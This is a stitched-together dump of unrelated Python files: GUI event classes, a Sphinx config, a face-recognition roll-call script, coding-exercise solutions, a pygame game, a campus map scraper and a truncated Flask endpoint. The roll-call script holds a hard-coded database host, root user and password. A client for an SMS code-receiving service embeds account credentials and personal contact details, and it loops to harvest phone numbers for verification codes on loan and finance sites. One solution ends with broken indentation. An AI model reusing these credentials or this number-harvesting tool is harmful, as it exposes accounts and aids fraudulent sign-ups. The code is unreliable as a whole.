# Local imports.
from task_window import TaskWindow
class TaskWindowEvent(HasTraits):
    """ A task window lifecycle event.

    Fired for window lifecycle notifications (e.g. opening/closing).
    """
    # The window that the event occurred on.
    window = Instance(TaskWindow)
class VetoableTaskWindowEvent(TaskWindowEvent, Vetoable):
    """ A vetoable task window lifecycle event.
    """
    # NOTE(review): the Vetoable mixin presumably provides the veto flag
    # listeners set to cancel the action — confirm against the traits docs.
    pass
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "firecrown"
copyright = "2022, LSST DESC Firecrown Contributors"
author = "LSST DESC Firecrown Contributors"
# The full version, including alpha/beta/rc tags
release = "1.1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    "autoclasstoc",
    "sphinx.ext.autodoc",
    "sphinx.ext.autosummary",
    "sphinx.ext.coverage",
    "sphinx.ext.doctest",
    "sphinx.ext.mathjax",
    "sphinx.ext.napoleon",
    "sphinx.ext.todo",
    "sphinx.ext.viewcode",
    "sphinx_autodoc_typehints",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# Attempt to generate a sidebar
html_sidebars = {"**": ["localtoc.html", "sourcelink.html", "searchbox.html"]}
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
html_theme_options = {"collapse_navigation": False}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Extension configuration -------------------------------------------------
# mathjax
# NOTE(review): cdn.mathjax.org was retired — confirm this URL still
# resolves, or drop mathjax_path to use the default CDN Sphinx ships with.
mathjax_path = (
    "https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"
)
# autosummary
autosummary_generate = True
# Some style options
highlight_language = "python3"
pygments_style = "sphinx"
todo_include_todos = True
add_function_parentheses = True
add_module_names = True
set_type_checking_flag = True
typehints_fully_qualified = False
always_document_param_types = True
typehints_document_rtype = True
# Modules autodoc should mock rather than import (heavy/optional deps).
autodoc_mock_imports = [
    "ccl",
    "pyccl",
    "numpy.typing._ufunc",
    "pandas._typing",
    "pandas",
    "numpy._typing._ufunc",
]
# Napoleon compiles the docstrings into .rst
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = True
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = True
napoleon_use_param = True
napoleon_use_rtype = True
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
# NOTE(review): todo_include_todos is already set to True above; this
# duplicate assignment is redundant (harmless, same value).
todo_include_todos = True
# Options exported to sphinx-apidoc via the environment variable below.
sphinx_apidoc_options = [
    "members",
    "show-inheritance",
    "private-members",
    "special-members",
]
os.environ["SPHINX_APIDOC_OPTIONS"] = ",".join(sphinx_apidoc_options)
autoclasstoc_sections = [
    "public-methods",
    "private-methods",
]
# Copied from github.com/sanderslab/magellanmapper:
# automate building API .rst files, necessary for ReadTheDocs, as inspired by:
# https://github.com/readthedocs/readthedocs.org/issues/1139#issuecomment-398083449
def run_apidoc(_):
    """Run sphinx-apidoc over ../firecrown, writing .rst stubs into _api.

    Intended as a Sphinx event callback (the ignored argument is the app);
    handles both the >=1.7 and the pre-1.7 apidoc module locations.
    """
    ignore_paths = []
    argv = [
        "--separate",
        "-f",
        "-M",
        "-e",
        "-E",
        "-T",
        "-d",
        "1",
        "-o",
        "_api",
        "../firecrown",
    ] + ignore_paths
    try:
        # Sphinx >= 1.7
        from sphinx.ext import apidoc
        apidoc.main(argv)
    except ImportError:
        # Sphinx < 1.7
        from sphinx import apidoc
        # The old-style CLI expects the program name as argv[0].
        argv.insert(0, apidoc.__file__)
        apidoc.main(argv)
|
import face_API as face
import pymysql as pl
import pre_process as pp
import json
# Module-level roster cache: student ID -> {'name': ..., 'class': ...};
# filled by entercourse() and read by rollcall()/form().
infodict = {}
def entercourse(coursename):  # Tested
    """Populate the module-level ``infodict`` with the roster of *coursename*.

    infodict maps student ID -> {'name': ..., 'class': ...}. On an unknown
    course name a message is printed and infodict is left untouched.
    """
    db = pl.connect(host="rm-m5ec899sxqwx2rc9tgo.mysql.rds.aliyuncs.com",
                    user="root", password="Aa123456", db="classroom", charset='utf8')
    cur = db.cursor()
    try:
        # SECURITY FIX: bind user-supplied values as parameters instead of
        # formatting them into the SQL string (injection risk).
        cur.execute("select courseid from courses where coursename=%s", (coursename,))
        row = cur.fetchone()
        if row is None:
            print("No such a course!")
            return
        courseid = row[0]
        # Table names cannot be bound as parameters; courseid comes from our
        # own `courses` table, not directly from user input.
        cur.execute("select id from {}".format(courseid))
        idlist = [r[0] for r in cur.fetchall()]
        global infodict
        infodict = {}
        for ID in idlist:
            cur.execute("select * from students where ID=%s", (ID,))
            lls = cur.fetchall()[0]
            infodict[lls[0]] = {'name': lls[1], 'class': lls[2]}
    finally:
        # BUG FIX: the original leaked the connection when the course was
        # not found (the early return skipped cur.close()/db.close()).
        cur.close()
        db.close()
def rollcall(img_url):
    """Run face recognition on *img_url* and write display/rollcall.json.

    Splits the roster in ``infodict`` into students recognized in the image
    ("done") and the rest ("undone"), each grouped by class via form().
    """
    global infodict
    pp.small(img_url)  # shrink/pre-process the image before the API call
    recognized = face.multi_search(img_url)
    donels, undonels = [], []
    for sid in infodict:
        if sid in recognized:
            donels.append(sid)
        else:
            undonels.append(sid)
    dic = {}
    dic["donenumber"] = len(donels)
    dic["undonenumber"] = len(undonels)
    dic["done"] = form(donels)
    dic["undone"] = form(undonels)
    # BUG FIX: ensure_ascii=False writes raw non-ASCII names, so the file
    # must be opened with an explicit utf-8 encoding (the platform default
    # encoding may not handle them).
    with open("display/rollcall.json", "w", encoding="utf-8") as fp:
        json.dump(dic, fp, ensure_ascii=False, indent=2)
def form(ls):  # Tested
    """Group the given student IDs by class: {class: {ID: name}}."""
    global infodict
    grouped = {}
    for sid in ls:
        cls_name = infodict[sid]['class']
        grouped.setdefault(cls_name, {})[sid] = infodict[sid]['name']
    return grouped
|
def checkInitialisationMC(solverWrapperDictionary,positionMaxNumberIterationsCriterion=None,tolerances=None):
    """Validate a Monte Carlo configuration before the algorithm starts."""
    checkInitialisationSolverWrapper(solverWrapperDictionary)
    # The max-iterations criterion only needs checking for asynchronous runs.
    if solverWrapperDictionary.get("asynchronous") is True:
        checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances)
def checkInitialisationCMLMC():
    # Placeholder: no CMLMC-specific initialisation checks yet.
    pass
def checkInitialisationAMLMC():
    # Placeholder: no AMLMC-specific initialisation checks yet.
    pass
def checkInitialisationMLMC(solverWrapperDictionary,positionMaxNumberIterationsCriterion=None,tolerances=None):
    """Validate a Multilevel Monte Carlo configuration before the run starts."""
    checkInitialisationSolverWrapper(solverWrapperDictionary)
    # The max-iterations criterion only needs checking for asynchronous runs.
    if solverWrapperDictionary.get("asynchronous") is True:
        checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances)
def checkInitialisationSolverWrapper(solverWrapperDictionary):
    """Check that outputBatchSize fits within numberQoI + numberCombinedQoi."""
    # Defaults mirror the solver wrapper's own: batch 1, 0 combined, 1 plain QoI.
    batch_size = solverWrapperDictionary.get("outputBatchSize", 1)
    combined_qoi = solverWrapperDictionary.get("numberCombinedQoi", 0)
    plain_qoi = solverWrapperDictionary.get("numberQoI", 1)
    if batch_size > plain_qoi + combined_qoi:
        raise Exception ("solverWrapperDictionary: outputBatchSize exceeding maximum dimension. Set a value <= numberQoI + numberCombinedQoI.")
def checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances):
    """Ensure the max-iterations criterion exists and is the last monoCriterion."""
    # Guard clause: the criterion must be configured at all.
    if positionMaxNumberIterationsCriterion is None:
        raise Exception ("positionMaxNumberIterationsCriterion not set in xmcDictionary. Set it in order to run the asynchronous framework.")
    # Its position must point at the final tolerance entry.
    if len(tolerances) != (positionMaxNumberIterationsCriterion + 1):
        raise Exception ("Number of monoCriteria defined in monoCriteriaDictionary and positionMaxNumberIterationsCriterion defined in xmcAlgorithmDictionary not consistent. Should be positionMaxNumberIterationsCriterion = number monoCriteria and the monoCriterion defining the maximum number of iterations set as last entry of monoCriteriaDictionary.")
import sys
import pygame
from pygame.sprite import Sprite, Group
def fire_bullet(screen, bullets, rocket):
    """Add a new bullet to *bullets* unless four are already in flight."""
    at_capacity = len(bullets) >= 4
    if not at_capacity:
        bullets.add(Bullet(screen, rocket))
def check_events(rocket, screen, bullets):
    """Respond to keypresses and mouse events (quit, move, fire)."""
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            sys.exit()
        elif event.type == pygame.KEYDOWN:
            # Key pressed: start moving or fire.
            if event.key == pygame.K_UP:
                rocket.moving_up = True
            if event.key == pygame.K_DOWN:
                rocket.moving_down = True
            if event.key == pygame.K_SPACE:
                fire_bullet(screen, bullets, rocket)
        elif event.type == pygame.KEYUP:
            # Key released: stop moving in that direction.
            if event.key == pygame.K_UP:
                rocket.moving_up = False
            if event.key == pygame.K_DOWN:
                rocket.moving_down = False
class Bullet(Sprite):
    """A class to manage bullets fired from the ship.

    Bullets travel rightward (+x grows in update()), matching the ship
    which is rotated to face right; update() also draws the bullet.
    """
    def __init__(self, screen, ship):
        """Create a bullet object at the ship's current position"""
        super(Bullet, self).__init__()
        self.screen = screen
        # Create a bullet rect at (0, 0) and then set correct position
        self.rect = pygame.Rect(0, 0, 20, 5)
        self.rect.centerx = ship.rect.centerx
        self.rect.top = ship.rect.top
        # Store the bullet's position as a decimal value
        self.x = self.rect.x
        self.color = (60, 60, 60)
        self.speed_factor = 3
    def update(self):
        """Move the bullet up the screen."""
        # Update the decimal position of the bullet
        self.x += self.speed_factor
        # Update the rect position
        self.rect.x = int(self.x)
        # Drawing happens here too, so a separate draw call is not needed.
        self.draw_bullet()
    def draw_bullet(self):
        """Draw the bullet to the screen."""
        pygame.draw.rect(self.screen, self.color, self.rect)
class Rocket:
    """The player's ship: moves vertically along the left edge of the screen."""
    def __init__(self, screen):
        # Movement flags toggled by key events in check_events().
        self.moving_up = False
        self.moving_down = False
        # Rotate the ship image 270 degrees so it faces right.
        self.image = pygame.image.load('ship.bmp')
        self.image = pygame.transform.rotate(self.image, 270)
        self.screen_rect = screen.get_rect()
        self.rect = self.image.get_rect()
        self.rect.centery = self.screen_rect.centery
        self.rect.bottom = self.screen_rect.bottom
        # Float copy of the vertical position for sub-pixel movement.
        self.centery = float(self.rect.centery)
    def update(self):
        """Update the rocket's position based on the movement flag."""
        # Clamp movement to the screen's top/bottom edges.
        if self.moving_up and self.rect.top > self.screen_rect.top:
            self.centery -= 2
        if self.moving_down and self.rect.bottom < self.screen_rect.bottom:
            self.centery += 2
        self.rect.centery = int(self.centery)
    def blitme(self, screen):
        """Draw the rocket at its current position."""
        screen.blit(self.image, self.rect)
def run_game():
    """Game entry point: set up pygame and run the event/update/draw loop."""
    # Initialize game and create a screen object.
    pygame.init()
    screen = pygame.display.set_mode((1024, 786))
    screen_rect = screen.get_rect()
    bullets = Group()
    rocket = Rocket(screen)
    # Start the main loop for the game.
    while True:
        # Redraw the screen during each pass through the loop
        screen.fill((255, 255, 255))
        # Watch for keyboard and mouse events.
        check_events(rocket, screen, bullets)
        rocket.update()
        rocket.blitme(screen)
        bullets.update()
        # Drop bullets that have flown off the right edge of the screen.
        for bullet in bullets.copy():
            if bullet.x > screen_rect.right:
                bullets.remove(bullet)
        # Make the most recently drawn screen visible.
        pygame.display.flip()
run_game()
|
# Reverse Integer
# Given a 32-bit signed integer, reverse digits of an integer.
#
# Example 1:
#
# Input: 123
# Output: 321
# Example 2:
#
# Input: -123
# Output: -321
# Example 3:
#
# Input: 120
# Output: 21
# Note:
# Assume we are dealing with an environment which could only hold integers within the 32-bit signed integer range. For the purpose of this problem, assume that your function returns 0 when the reversed integer overflows.
class Solution(object):
    """LeetCode 7: reverse the digits of a 32-bit signed integer."""

    def reverse(self, x):
        """Return *x* with its digits reversed, or 0 on 32-bit overflow."""
        if x == 0:
            return 0
        negative = x < 0
        magnitude = -x if negative else x
        flipped = 0
        while magnitude > 0:
            magnitude, digit = divmod(magnitude, 10)
            flipped = flipped * 10 + digit
        # Clamp to the asymmetric signed 32-bit range [-2**31, 2**31 - 1].
        if negative:
            return -flipped if flipped <= 2147483648 else 0
        return flipped if flipped <= 2147483647 else 0
if __name__ == '__main__':
s=Solution()
print("Solution is : " + str(s.reverse(-123))) |
import requests
import random
# location_types = [
# "Blue",
# "AllGender",
# "Water",
# ]
# Maps a Cornell map overlay layer name to the human-readable location type
# stored in each result record.
type_dict = {
    "Blue": "Blue Light",
    "AllGender": "Bathroom",
    "Water": "Water",
}
def get_img_url(ltype):
    """Return one of three stock S3 image URLs for a location type, at random."""
    prefix_by_type = {
        "Blue": "bluelight",
        "AllGender": "all_gender",
        "Water": "water",
    }
    pick = random.randint(0, 2)
    return f"https://cornell-places-assets.s3.amazonaws.com/{prefix_by_type[ltype]}{pick}.jpg"
def get_locationdata(ltype):
    """Fetch map overlay items of *ltype* from cornell.edu and normalize them.

    Retries up to three times on network/HTTP failure; returns [] when every
    attempt fails (the original then crashed on an unbound ``r``).
    """
    url = f"https://www.cornell.edu/about/maps/overlay-items.cfm?layer={ltype}&clearCache=1"
    r = None
    for _ in range(3):
        try:
            r = requests.get(url, timeout=5)
            r.raise_for_status()
        # FIX: narrowed from a bare except — only network/HTTP errors retry.
        except requests.RequestException:
            r = None
        else:
            break
    if r is None:
        return []
    dlist = r.json().get("items", [])
    res = []
    for data in dlist:
        raw_name = data.get("Name")
        # BUG FIX: the original did str(data.get("Name")) first, so a missing
        # name became the string "None" and was never filtered out.
        if raw_name is not None and ltype in type_dict:
            ndata = dict()
            ndata["lat"] = data.get("Lat")
            ndata["lon"] = data.get("Lng")
            ndata["name"] = str(raw_name)
            ndata["types"] = type_dict[ltype]
            ndata["image_url"] = get_img_url(ltype)
            res.append(ndata)
    return res
def get_mapdata():
    """Aggregate location records across every supported location type."""
    combined = []
    for location_type in type_dict:
        combined.extend(get_locationdata(location_type))
    return combined
|
# coding=utf-8
import os
import sys
import time
import json
import gevent
import logging
import requests
from utils import save_items, get_items_from_file, add_item_fields, log_init, save_items_with_json
# Python 2 idiom: reload(sys) re-exposes setdefaultencoding so the default
# string encoding can be forced to UTF-8 for this module's Chinese text
# (this mechanism does not exist in Python 3).
reload(sys)
sys.setdefaultencoding('utf8')
# 速码(www.eobzz.com)
# 账号/密码: hbbhbb(rfM#!EzZU%!3s7*kxbTy)
# 平台接口前缀: 'http://api.eobzz.com/api/do.php?action='
'''
账户基本信息
account_info = {
'user_info': {
u'用户名': 'hbbhbb',
u'账号状态': '正常',
u'手机号码': '',
u'QQ 号码': '244815860',
u'E-Mail': '244815860@qq.com',
u'注册时间': '2017-09-19 15:31:24.69',
u'积 分': '251',
u'可获取号码': '50',
u'备注': '',
u'余额': '0.00',
u'充值总额': '0',
u'分成总额': '0.00',
u'消费总额': '0',
u'可提金额': '0.00',
u'已提金额': '0.00',
u'支付宝账号': '',
u'姓 名': '',
}
u'author_uid': '8902',
}
'''
class Ebozz(object):
    """Client for the eobzz.com ("Suma") SMS code-receiving platform.

    Handles login, listing items, fetching/blacklisting phone numbers and
    releasing held numbers, and wires up per-site item/phone/log file paths.
    NOTE(review): Python 2 only (``e.message``, and the caller uses print
    statements).
    """
    def __init__(self):
        # URL used to fetch the item (project) list from this platform
        self.item_url = "http://api.eobzz.com/clt.do?method=searchProByName"
        self.api_prefix = r'http://api.eobzz.com/api/do.php?action='
        self.author_uid = ''
        # SECURITY(review): credentials hard-coded in source -- rotate and
        # move to configuration.
        self.user_name = 'hbbhbb'
        self.user_pwd = 'rfM#!EzZU%!3s7*kxbTy'
        self.token = ''
        self.phone_list = ''
        self.headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9",
            "Cache-Control": "max-age=0",
            "Connection": "keep-alive",
            "Host": "api.eobzz.com",
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
        }
        # File that stores this site's item information
        website_name = "ebozz"
        items_file_name = '{website_name}_items.json'.format(website_name=website_name)
        self.items_file = os.path.join(sys.path[0], 'items', items_file_name)
        # File that stores the phone numbers eventually obtained (one per day)
        current_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
        phone_file_name = "{website_name}_phone_{date}.txt".format(website_name=website_name, date=current_date)
        self.phone_file = os.path.join(sys.path[0], "data", phone_file_name)
        # LOG: one log file per month
        month = time.strftime('%Y-%m', time.localtime(time.time()))
        log_file_name = '{website_name}_{month}.log'.format(website_name=website_name, month=month)
        self.log_file = os.path.join(sys.path[0], 'log', log_file_name)
        save_items([], self.phone_file)
        log_name = self.__class__.__name__
        log_init(log_name, self.log_file)
        self.logger = logging.getLogger(log_name)
        self.logger.info(u'开始采集' + '-' * 30)
    # Unified request handling
    def request(self, url, request_type, payload=None):
        # url: request URL
        # request_type: "post"/"POST" -> POST, anything else -> GET
        # payload: request parameters
        # NOTE(review): the `if retry_time > 3: pass` branches below never
        # exit the `while 1` loop -- a break/return was probably intended,
        # so persistent failures can retry forever.
        retry_time = 0
        while 1:
            try:
                with gevent.Timeout(10, requests.Timeout):
                    try:
                        if request_type == "post" or request_type == "POST":
                            response = requests.post(url=url, headers=self.headers, data=payload, allow_redirects=False)
                        else:
                            response = requests.get(url=url, headers=self.headers, params=payload, allow_redirects=False)
                        if not response.text:
                            retry_time += 1
                            logging.info(u"返回内容为空,重试中。。。")
                            if retry_time > 3:
                                pass
                            else:
                                return ""
                        if response.status_code == 200:
                            return response.text
                        else:
                            logging.info(u"状态码是 {status_code}, 返回空内容。".format(status_code=response.status_code))
                            return ""
                    except requests.Timeout:
                        retry_time += 1
                        logging.info(u"连接超时,重试中。。。")
                        if retry_time > 3:
                            pass
                        else:
                            continue
            except requests.Timeout:
                # Raised by the gevent.Timeout guard after 10 seconds.
                retry_time += 1
                logging.info(u"连接超时,重试中。。。")
                if retry_time > 3:
                    pass
                else:
                    continue
            except Exception as e:
                print(e)
    # Log in and obtain the user token
    def login(self):
        url = self.api_prefix + 'loginIn'
        payload = {
            "name": self.user_name,
            "password": self.user_pwd
        }
        text = self.request(url=url, request_type="get", payload=payload)
        if text:
            try:
                # Response format: "<status>|<token>"; status "0" means failure.
                status_code, token = text.split("|")
                if status_code == "0":
                    raise Exception
                self.token = token
                self.logger.info(u'登录成功!')
            except Exception:
                self.logger.info(u'登录失败!')
    # Fetch the item (project) list
    def get_items(self):
        # Response format:
        # [{"name": item name, "price": item price, "projectID": item ID,
        #   "remark": remark, "result": item status}]
        # The platform has no item categories, so item_type is fixed to "1".
        url = self.item_url
        payload = {
            'userID': self.user_name,
            'key': self.token,
            'name': u"[a-z0-9贷金融理财网富服所投宝钱易线创汇信贷众资银]"
        }
        text = self.request(url=url, request_type="get", payload=payload)
        items = []
        if text:
            json_text = json.loads(text)
            # NOTE(review): `len(json_text) < 0` is always False (`== 0` was
            # probably intended), and `json_text[0]` raises IndexError when
            # the list is empty -- TODO confirm and fix.
            if len(json_text) < 0 or json_text[0]['result'] != "111":
                self.logger.info(u'获取项目列表失败!')
            else:
                for item in json_text:
                    item_dict = dict(zip(
                        ['item_id', 'item_name', 'item_price', 'item_type'],
                        [item["projectID"], item["name"], item["price"], "1"]))
                    item_type = item_dict.get('item_type')
                    if item_type is not None:
                        items.append(item_dict)
        return items
    # Fetch a phone number for an item
    def get_phone(self, item_id):
        # item_id: item ID
        url = self.api_prefix + 'getPhone'
        payload = {
            'token': self.token,
            "sid": item_id
        }
        text = self.request(url=url, request_type="get", payload=payload)
        phones = []
        if text:
            try:
                # Response format: "<status>|<comma-separated numbers>"
                status_code, phones_str = text.split("|")
                if status_code == "0":
                    raise Exception
                phones = phones_str.split(",")
            except Exception:
                pass
        return phones
    # Blacklist a specific phone number for an item
    def add_black_list(self, item_id, phone):
        url = self.api_prefix + 'addBlacklist'
        payload = {
            'token': self.token,
            "sid": item_id,
            "phone": str(phone)
        }
        text = self.request(url=url, request_type="get", payload=payload)
        phones = []
        if text:
            try:
                status_code, msg = text.split("|")
                if status_code == "0":
                    raise Exception(msg)
                self.logger.info(u'加黑指定手机号码成功!')
            except Exception as e:
                # NOTE(review): e.message is Python 2 only.
                self.logger.info(u'加黑指定手机号码失败!{msg}'.format(msg=e.message))
        return phones
    # Request one specific phone number for an item; returns ['1'] on success.
    def get_specific_phone(self, item_id, phone):
        url = self.api_prefix + 'getPhone'
        payload = {
            'token': self.token,
            "sid": item_id,
            "phone": str(phone)
        }
        text = self.request(url=url, request_type="get", payload=payload)
        if text:
            try:
                status_code, phones_str = text.split("|")
                if status_code == "0":
                    raise Exception(phones_str)
                return ['1']
            except Exception as e:
                self.logger.info(u'获取指定手机号码失败!{msg}'.format(msg=e.message))
        return []
    # Release every phone number currently held by this account
    def release_phone(self):
        url = self.api_prefix + 'cancelAllRecv'
        payload = {'token': self.token}
        text = self.request(url=url, request_type="", payload=payload)
        if text:
            try:
                status_code, msg = text.split("|")
                if status_code == "0":
                    raise Exception(msg)
                self.logger.info(u'释放所有手机号码成功!')
            except Exception as e:
                self.logger.info(u'释放所有手机号码失败!{msg}'.format(msg=e.message))
    def exit(self):
        # Only logs locally; no server-side logout call is made here.
        self.logger.info(u'退出成功!')
def main():
    """Drive one full collection run: log in, release any held numbers,
    load or fetch the item list, then repeatedly pull numbers per item
    until they look exhausted (too many repeats/empties) or the retry
    budget runs out.  NOTE(review): Python 2 print statements below.
    """
    ebozz = Ebozz()
    ebozz.login()
    ebozz.release_phone()
    # Prefer the cached item list on disk; otherwise fetch and cache it.
    if os.path.exists(ebozz.items_file):
        items = get_items_from_file(ebozz.items_file)
        ebozz.logger.info(u'从文件中读取__%s__网站可接收验证码项目%d个。' % (
            str(ebozz.__class__).split('.')[1].strip("'>"), len(items)))
    else:
        items = ebozz.get_items()
        save_items_with_json(items, ebozz.items_file)
        ebozz.logger.info(u'一共获取__%s__网站可接收验证码项目%d个。' % (
            str(ebozz.__class__).split('.')[1].strip("'>"), len(items)))
    for item in items[:]:
        max_time_per_item = 1000
        retry_time_per_item = 0
        phones_per_item_set = set()
        saved_count = 0
        replicate_count = 0
        three_increase = [1, 1, 1]
        increase_length = 0
        empty_count = 0
        while 1:
            # Stop on too many duplicate numbers, too many attempts,
            # or too many empty responses.
            if replicate_count > 15 or retry_time_per_item >= max_time_per_item or empty_count >= 10:
                break
            item_name = item.get('item_name')
            item_id = item.get('item_id')
            item_price = float(item.get('item_price'))
            item_type = item.get('item_type')
            ebozz.logger.info(u'项目: __%s__, ID: __%s__, 价格: __%s__' % (item_name, item_id, item_price))
            if item_id and item_price <= 10:
                # if item_price <= 0.5:
                #     count = 20
                # else:
                #     count = int(10.0/item_price)
                num = ebozz.get_phone(item_id)
                ebozz.logger.info(num)
                if len(num) == 0:
                    empty_count += 1
                    ebozz.logger.info(u'没有获取到有效号码')
                    continue
                # Track distinct numbers returned so far for this item_id.
                last_length = len(phones_per_item_set)
                phones_per_item_set.add(num[0])
                current_length = len(phones_per_item_set)
                increase_length = current_length - last_length
                phone_items = []
                current_time = time.strftime(
                    '%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                phone_item = {
                    'item_name': item_name,  # item name
                    'item_id': item_id,  # item ID
                    'crawl_time': current_time,  # crawl time
                    'item_price': item_price,  # item price
                    'item_type': item_type,  # item type
                    'phone': num[0],  # phone number
                    'portal': u'速码',  # source portal
                }
                new_item = add_item_fields(phone_item)
                phone_items.append(new_item)
                if increase_length > 0:
                    save_items(phone_items, ebozz.phone_file)
                    saved_count += 1
                ebozz.release_phone()
                retry_time_per_item += 1
                # Use the repeat count to judge when this item's numbers
                # are mostly exhausted.
                replicate_count += (1 - increase_length)
                three_increase[2] = three_increase[1]
                three_increase[1] = three_increase[0]
                three_increase[0] = increase_length
                print three_increase
                # Log out so the token is dropped...
                ebozz.exit()
                # ...then log in again to refresh the token.
                ebozz.login()
            else:
                ebozz.logger.info(u'项目价格超过10元, 放弃.')
        print "",
    ebozz.logger.info(u'采集结束' + '-' * 30)
|
#047: Expected Number of Restriction Sites
#http://rosalind.info/problems/eval/
#Given: A positive integer n (n=1,000,000), a DNA string s of even length at most 10, and an array A of length at most 20, containing numbers between 0 and 1.
# Sample inputs; swap in the commented file-parsing block below for real data.
n = 10
s = 'AG'
A = [0.25, 0.563, 0.422]
#If parsing from file:
#f = open('rosalind_eval.txt', 'r')
#contents = f.read().strip()
#f.close()
#contents = contents.split('\n')
#n = int(contents[0])
#s = contents[1]
#A = [float(i) for i in contents[2].split(' ')]
#Return: An array B having the same length as A in which B[i] represents the expected number of times that s will appear as a substring of a random DNA string t of length n, where t is formed with GC-content A[i] (see "Introduction to Random Strings").
B = []
def getExpected(n, s, gc):
    """Expected number of occurrences of motif ``s`` in a random DNA string.

    The string has length ``n`` and GC-content ``gc``, so each position is
    A or T with probability (1-gc)/2 and G or C with probability gc/2.
    By linearity of expectation the answer is (number of windows) * P(match),
    and P(match) is the same for every window — so it is computed once
    instead of once per window as in the original.

    Returns 0 when ``s`` is longer than ``n`` (no windows).
    """
    windows = n - len(s) + 1
    if windows <= 0:
        return 0
    p = 1.0
    for base in s:
        # A/T share probability (1-gc); G/C share probability gc.
        p *= (1 - gc) / 2 if base in 'AT' else gc / 2
    return windows * p
# One expected-count per GC-content in A.
B = [getExpected(n,s,a) for a in A]
# NOTE(review): Python 2 print statement; this script must run under Python 2.
print B
#If writing to file:
#w = open('rosalind_eval_output.txt', 'w')
#for b in B:
#w.write(str(b) + ' ')
#w.close()
|
"""
문제
N개의 숫자가 공백 없이 쓰여있다. 이 숫자를 모두 합해서 출력하는 프로그램을 작성하시오.
입력
첫째 줄에 숫자의 개수 N (1 ≤ N ≤ 100)이 주어진다. 둘째 줄에 숫자 N개가 공백없이 주어진다.
출력
입력으로 주어진 숫자 N개의 합을 출력한다.
예제 입력 1
1
1
예제 출력 1
1
예제 입력 2
5
54321
예제 출력 2
15
"""
# Read the digit count (not actually used by sum_c) and the digit string.
a=int(input())
N=input()
def sum_c(a):
    """Return the sum of the decimal digits in the string ``a``.

    Replaces the original copy-into-a-list-then-accumulate loops with a
    single generator expression over the characters of ``a``.
    """
    return sum(int(digit) for digit in a)
print(sum_c(N)) |
import logging
import sys
from io import StringIO
# Demo: one logger fanned out to two handlers -- an in-memory buffer that
# captures everything (DEBUG and up) and a console stream limited to INFO+.
logger = logging.getLogger('test')
logger.setLevel(logging.DEBUG)
buffer_stream = StringIO()
buffer_handler = logging.StreamHandler(stream=buffer_stream)
console_handler = logging.StreamHandler(stream=sys.stdout)
# Per-handler level filtering: buffer records all, console filters.
buffer_handler.setLevel(logging.DEBUG)
console_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
buffer_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
logger.addHandler(buffer_handler)
|
import json
from flask import request
from requirementmanager.app import app
from requirementmanager.mongodb import (
requirement_collection, archive_requirement_collection
)
from requirementmanager.dao.requirement_list import RequirementListMongoDBDao
from requirementmanager.dao.archive import ArchiveRequirementListMongoDBDao
from requirementmanager.utils.handle_api import handle_response
from requirementmanager.api.requirement.analyze._utils import (
wrap_add_single_requirement, wrap_tree_requirements,
wrap_edit_single_requirement, wrap_compared_requirements
)
from requirementmanager.grpc_client.client import GrpcClient
META_SUCCESS = {'status': 200, 'msg': '冲突检测成功!'}
@app.route('/requirement/analyze/conflict', methods=['POST'])
@handle_response
def requirement_analyze_conflict():
    """Detect conflicts between submitted requirement(s) and an existing set.

    Request body: ``{"target_data": ..., "target_type": "add_single" |
    "tree" | "edit_single", "scope": {"project_id": str, "version": str}}``.
    Returns only conflict pairs that involve at least one submitted
    requirement.
    """
    body = request.json
    target_data = body['target_data']
    # Type of the analyzed requirement: add_single, tree or edit_single;
    # each type gets a different wrap below.
    target_type = body['target_type']
    scope = body['scope']  # {"project_id": str, "version": str}
    # A falsy version means the current version -> requirement_collection;
    # otherwise look up the archived version.
    if not scope['version']:
        requirement_list_dao = RequirementListMongoDBDao(
            requirement_collection
        )
        compared_reqs_list = requirement_list_dao.get_requirement_list(
            project_id=scope['project_id']
        )
    else:
        requirement_list_dao = ArchiveRequirementListMongoDBDao(
            archive_requirement_collection
        )
        compared_reqs_list = requirement_list_dao.get_requirement_list(
            project_id=scope['project_id'], version=scope['version']
        )
    # wrap target_data
    # NOTE(review): target_reqs_dict stays undefined (NameError further down)
